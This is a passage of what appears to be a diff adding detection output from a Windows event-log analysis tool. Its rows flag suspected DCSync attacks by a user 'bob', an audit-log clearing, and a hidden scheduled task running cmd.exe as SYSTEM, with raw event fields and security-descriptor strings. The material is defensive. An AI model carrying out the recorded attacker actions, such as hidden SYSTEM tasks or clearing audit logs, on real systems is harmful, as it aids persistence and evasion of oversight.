754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
+ %%14675
+
+",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
+
+
+
+
+ 5136
+ 0
+ 0
+ 14081
+ 0
+ 0x8020000000000000
+
+
+ 198242593
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ 57DCCD4C-7381-4371-8480-D74D47019AD8
+ -
+ S-1-5-21-738609754-2819869699-4189121830-1108
+ bob
+ insecurebank
+ 0x40f2719
+ insecurebank.local
+ %%14676
+ DC=insecurebank,DC=local
+ C6FAF700-BFE4-452A-A766-424F84C29583
+ domainDNS
+ nTSecurityDescriptor
+ 2.5.5.15
+ O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
+ %%14674
+
+",DC1.insecurebank.local,Security
+schedule task created,1553508330.695604,2019-03-19T04:02:04.335561+04:00,,Audit,High,schedule task created by user,4698,"
+
+
+
+
+ 4698
+ 0
+ 0
+ 12804
+ 0
+ 0x8020000000000000
+
+
+ 566836
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ S-1-5-21-1587066498-1489273250-1035260531-500
+ Administrator
+ EXAMPLE
+ 0x17e2d2
+ \CYAlyNSS
+ <?xml version="1.0" encoding="UTF-16"?>
+<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
+ <Triggers>
+ <CalendarTrigger>
+ <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
+ <Enabled>true</Enabled>
+ <ScheduleByDay>
+ <DaysInterval>1</DaysInterval>
+ </ScheduleByDay>
+ </CalendarTrigger>
+ </Triggers>
+ <Principals>
+ <Principal id="LocalSystem">
+ <UserId>S-1-5-18</UserId>
+ <RunLevel>HighestAvailable</RunLevel>
+ <LogonType>InteractiveToken</LogonType>
+ </Principal>
+ </Principals>
+ <Settings>
+ <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
+ <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
+ <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
+ <AllowHardTerminate>true</AllowHardTerminate>
+ <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
+ <IdleSettings>
+ <StopOnIdleEnd>true</StopOnIdleEnd>
+ <RestartOnIdle>false</RestartOnIdle>
+ </IdleSettings>
+ <AllowStartOnDemand>true</AllowStartOnDemand>
+ <Enabled>true</Enabled>
+ <Hidden>true</Hidden>
+ <RunOnlyIfIdle>false</RunOnlyIfIdle>
+ <WakeToRun>false</WakeToRun>
+ <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
+ <Priority>7</Priority>
+ </Settings>
+ <Actions Context="LocalSystem">
+ <Exec>
+ <Command>cmd.exe</Command>
+ <Arguments>/C tasklist > %windir%\Temp\CYAlyNSS.tmp 2>&1</Arguments>
+ </Exec>
+ </Actions>
+</Task>
+
+",WIN-77LTAPHIQ1R.example.corp,Security
+Audit log cleared,1552953724.335561,2019-03-25T14:05:30.695604+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 198238040
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+
+ S-1-5-21-738609754-2819869699-4189121830-1108
+ bob
+ insecurebank
+ 0x8d7099
+
+
+",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
+
+
+
+
+ 5136
+ 0
+ 0
+ 14081
+ 0
+ 0x8020000000000000
+
+
+ 198242592
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ 57DCCD4C-7381-4371-8480-D74D47019AD8
+ -
+ S-1-5-21-738609754-2819869699-4189121830-1108
+ bob
+ insecurebank
+ 0x40f2719
+ insecurebank.local
+ %%14676
+ DC=insecurebank,DC=local
+ C6FAF700-BFE4-452A-A766-424F84C29583
+ domainDNS
+ nTSecurityDescriptor
+ 2.5.5.15
+ O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
+ %%14675
+
+",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
+
+
+
+
+ 5136
+ 0
+ 0
+ 14081
+ 0
+ 0x8020000000000000
+
+
+ 198242591
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ A1AA38AA-447E-46C2-ABA0-D205D4D8F873
+ -
+ S-1-5-21-738609754-2819869699-4189121830-1108
+ bob
+ insecurebank
+ 0x40f2719
+ insecurebank.local
+ %%14676
+ DC=insecurebank,DC=local
+ C6FAF700-BFE4-452A-A766-424F84C29583
+ domainDNS
+ nTSecurityDescriptor
+ 2.5.5.15
+ O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
+ %%14674
+
+",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
+
+
+
+
+ 5136
+ 0
+ 0
+ 14081
+ 0
+ 0x8020000000000000
+
+
+ 198242590
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ A1AA38AA-447E-46C2-ABA0-D205D4D8F873
+ -
+ S-1-5-21-738609754-2819869699-4189121830-1108
+ bob
+ insecurebank
+ 0x40f2719
+ insecurebank.local
+ %%14676
+ DC=insecurebank,DC=local
+ C6FAF700-BFE4-452A-A766-424F84C29583
+ domainDNS
+ nTSecurityDescriptor
+ 2.5.5.15
+ O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c0